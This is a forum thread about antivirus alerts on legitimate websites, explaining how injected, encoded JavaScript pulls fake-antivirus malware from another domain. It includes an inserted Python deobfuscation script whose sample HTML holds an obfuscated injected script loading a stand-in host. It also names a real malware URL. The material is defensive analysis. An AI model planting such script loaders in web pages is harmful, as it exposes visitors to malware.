i have several warnings from client machines that perfectly legit websites are infected by html:script-inf
the latest one is this:
: File “hxxp://advisor.morningstar.com/microsite/default.aspx?client=cambridge” is infected by “HTML:Script-inf” virus.
“Resident protection (Web Shield)” task used Version of current VPS file is 110330-0, 03/30/2011
is there something bad about that site, or is a script just causing avast to freak because it’s redirecting or something?
i wish there was a way to just whitelist “html:script-inf” and the other ones that seem way too broad (html:iframe-inf, win32:malware-gen) some previous examples that seem to come and go:
d:\autorun.inf on a factory stamped office 2000 cd. surely the non-writable factory cd is infected with inf:autorun worm
File “hyyp://www.inventorshelp.com/index.php?option=com_contact&view=contact&id=1&Itemid=72” is infected by “JS:Redirector-DC [Trj]” virus
File “C:\Documents and Settings\All Users\Application Data\Adobe\Acrobat\9.2\ARM\Elevator.exe” is infected by “Win32:Malware-gen”
basically anything on photobucket, html-script-inf
File “hzzp://my.yahoo.com/” is infected by “HTML:Script-inf”
but the only one i really care about right now is our client trying to get to morningstar.com, which being an investment site, you can imagine they’re panicking about it being a virus site now
Web application details:
Application: Joomla! 1.5 - Open Source Content Management - http://www.joomla.org
Web application version:
Joomla Version 1.5.8 to 1.5.14 for: htxp://www.inventorshelp.com//media/system/js/caption.js
Joomla Version 1.5.2 to 1.5.7 for: hxtp://www.inventorshelp.com//language/en-GB/en-GB.ini
Please can you modify the link, to prevent others potentially becoming infected. (change http to hXXp) Thanks.
For the morningstar link, it seems that avast is alerting on a script that points to a php file on a site that avast blocks (network shield blocks a direct connection)
This script occurs 3 times within the page.
Whether the detection on the site it links to is good or not I don’t know.
The site it links to appears to be down, however avast still blocks the attempt to connect.
on the inventorshelp site, you said sucuri says this:
Malware entry: MW:JS:445
Description:This encoded javascript loads malware (the fake AV) from:
*.ars3000.serveblog.net/ml.php (and other domains)
i want to know where on inventorshelp actually loads that malware
or is it because inventorshelp mentions joomla’s homepage at the very bottom, basically saying joomla is used on parts of the site… and maybe joomla’s homepage actually loads the malware?
i don’t get any attempted infections when browsing around inventorshelp - it seems to be a pretty legit site anyway, just trying to see how the flow is when it comes to detections. does avast check every link 3 levels deep or something? (inventorshelp mentioned joomla, so go scan joomla, which mentions about 400 other random urls, so go check them all - if one is infected then inventorshelp must be infected?)
thanks for the additional info on inventorshelp - are you just looking at the view-source or is there an avast utility that can highlight what it thinks is infected?
i can’t tell what that script even does, avast just doesn’t like the length?
I am using a couple of tools…that is just a notepad++ window after I have pulled the source code. Then I isolate sections to find what avast is alerting on.
Using another tool, it appears that all that code returns a script that points to another site (avast will alert on this unobfuscated script as well). What is happening from there I don’t know.
I can’t seem to get any of the sites to resolve properly…Could be because I am trying in ubuntu?
EDIT: Pol, one of your links is one of the possibly infected ones and is live
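A small analyst-side script for the step described above (pull the page source, isolate each script block, and peel the encoding until the URL it points to is readable). This is an added example, not code from the thread or from any Avast tool; the sample HTML and the host names in it are constructed, and it only undoes String.fromCharCode, \xNN and %NN encodings, never executing the script.

```python
"""Statically peel common JavaScript obfuscation from page source and list off-site hosts it loads."""
import re
from urllib.parse import unquote, urlparse

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
URL_RE = re.compile(r"https?://[\w.-]+(?:/[\w./?=&%+-]*)?", re.I)
CHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")
HEX_RE = re.compile(r"\\x([0-9a-fA-F]{2})")

# Constructed sample page (hypothetical hosts): two first-party scripts plus one
# injected block that builds "document.write" from char codes and hides the
# remote script tag behind unescape(), the pattern discussed in the thread.
SAMPLE_HTML = """<html><body>
<script src="/media/system/js/caption.js"></script>
<script>var base = "http://www.example.com/media/system/";</script>
<script>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101)
 + "(unescape('%3Cscript src%3D%22http%3A%2F%2Fthird-party.example%2Fml.php%22%3E%3C%2Fscript%3E'))");</script>
</body></html>"""


def decode_layer(js: str) -> str:
    """Undo one layer: String.fromCharCode(...), \\xNN escapes, then %NN escapes."""
    js = CHARCODE_RE.sub(lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()), js)
    js = HEX_RE.sub(lambda m: chr(int(m.group(1), 16)), js)
    return unquote(js)


def decode_script(js: str, max_rounds: int = 5) -> str:
    """Repeat decode_layer until the text stops changing; nothing is ever executed."""
    for _ in range(max_rounds):
        decoded = decode_layer(js)
        if decoded == js:
            break
        js = decoded
    return js


def third_party_loads(html: str, page_host: str) -> list:
    """Return sorted (host, url) pairs that scripts on the page reach out to off-site."""
    hits = set()
    for attrs, body in SCRIPT_RE.findall(html):
        # external src= attribute plus whatever the inline body decodes to
        for url in URL_RE.findall(attrs + " " + decode_script(body)):
            host = (urlparse(url).hostname or "").lower()
            if host and host != page_host and not host.endswith("." + page_host):
                hits.add((host, url))
    return sorted(hits)


if __name__ == "__main__":
    for host, url in third_party_loads(SAMPLE_HTML, "www.example.com"):
        print(f"off-site load: {host} <- {url}")
```

Relative src= paths are treated as first-party and skipped, so only absolute URLs on other hosts are reported.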
@ I can’t seem to get any of the sites to resolve properly…Could be because I am trying in ubuntu?
well, i think dns is dns - resolution of names won’t be dependent on the OS
now i see how that long script is really a URL, amazing to me. that site (inventorshelp) should have nothing to do with a php file served from servemp3 dot com…
how does this stuff even happen, just poorly set permissions on people’s website files?
btw, i have nothing to do with creating or securing websites, i’m just receiving alerts from our client antiviruses
wow - i guess i assumed the bigger the website, the more SECURE it would be… and found it laughable that for example my.yahoo.com would be infected.
now i can see how involved it gets - yahoo probably doesn’t check all the advertisements they load, and the advertisers probably swap out scripts a day or two after, for something more malicious
should i even tell morningstar or inventorshelp, or would they not care / not believe me ?
If anything, a bigger site is a bigger target…and things like older management systems like wordpress etc… contribute to the infections…generally when you see updates for things like that it is (at least in part) for a security update.
@ I can't seem to get any of the sites to resolve properly...Could be because I am trying in ubuntu?
I meant the sites that the scripts point to. I have read that some are coded to only work in windows...similar to how some malware can detect when being run in a VM...
You can try and let the site owners know, and even send the link to this thread.
@ bryonTRN
Well my.yahoo.com opened just fine for me (no alert) my.yahoo.com as it is different based on a) if you have a Yahoo account and b) geographic location, etc.
If you have an account so you are redirected to your account default page, for me that is home.bt.yahoo.com and I don’t get an alert.
So unless you haven’t got a Yahoo account you shouldn’t end up at my.yahoo.com I would have thought.
If I were bryonTRN, I would do an additional spyware scan, quote from the link I gave above
this was done via ftp transfer with accounts user and pass.
It happened to a few of my clients, weeks after I gave them the cPanel password; as they are local clients and I developed their website, I keep all the passwords and tell them the password only if they ask me or need it.
Your computer or your client's computer is infected with some kind of spyware, and probably the passwords were kept in txt files.
I also recommend saving your passwords in free programs like KeePass Password Safe.
last week i got alerts from about 20% of our installed clients, all referencing my.yahoo.com (from my first post in this thread) - so yeah not sure what they were seeing but it seems to have gone away after the next updated virus defs
so - what can be done about these rogue AV infections coming from perfectly legit websites? can’t really block the referenced URLs they point to because they’re recreated thru automated processes… i mean there has to be a money trail, is there anyone even trying to stop them?
i’d bet there’s probably 10-20 actual humans behind all the various fake-av clones out there, why not just take them down? (not to derail the thread or anything)
Well avast’s web shield has blocked those script-inf attempts to infect for those sites that we have given information on. Avast is by far ahead of the game on these detections compared to others, but nothing is going to be 100%. So everyone should have a backup and recovery strategy for when things do happen, be that system problems or malware.
So all you can do is investigate the fact that avast is alerting, learn how we have found out that the detections are good (or otherwise), and that avoids having to wait for us to check it out.
They aren’t what I would consider human, but organised crime, as it is all about money: fake AV reports you are infected and wants you to buy the solution. Guess what, if a user actually hands over money, these leeches could likely subject them to card/identity fraud also.